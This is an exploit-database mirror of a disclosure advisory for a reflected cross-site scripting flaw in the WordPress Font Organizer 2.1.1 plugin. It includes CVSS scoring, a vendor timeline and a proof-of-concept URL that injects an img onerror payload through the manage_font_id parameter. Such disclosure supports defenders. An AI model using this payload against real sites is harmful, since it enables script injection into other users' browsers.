Advertisement






WordPress Font Organizer 2.1.1 Cross Site Scripting

CVE Category Price Severity
N/A CWE-79 N/A High
Author Risk Exploitation Type Date
Unknown High Remote 2019-02-06
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019020050

Below is a copy:

WordPress Font Organizer 2.1.1 Cross Site Scripting
  * Vulnerability: XSS
  * Affected Software:
[Font_Organizer](https://wordpress.org/plugins/font-organizer/)
  * Affected Version: 2.1.1
  * Patched Version: none
  * CVE: not requested
  * Risk: Medium
  * Vendor Contacted: 10/25/2018
  * Vendor Fix: none
  * Public Disclosure: 02/05/2019
  * Credit: Tim Coen

##### CVSS

6.1 Medium
[CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

##### Overview

The Font_Organizer WordPress plugin is vulnerable to reflected XSS as it
echoes the manage_font_id parameter without proper encoding.

##### Proof of Concept


http://192.168.0.103/wordpress/wp-admin/options-general.php?manage_font_id='"><img
src=x onerror=alert(1)>&page=font-setting-admin

##### Timeline

- 10/25/2018 Sent advisory (no response)
- 02/05/2019 Disclosure

##### Details & Full Advisory URL

https://security-consulting.icu/blog/2019/02/wordpress-font-organizer-xss/

-- 
PGP Key: https://pgp.mit.edu/pks/lookup?op=get&search=0x204DCBDD29BA0D89


Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum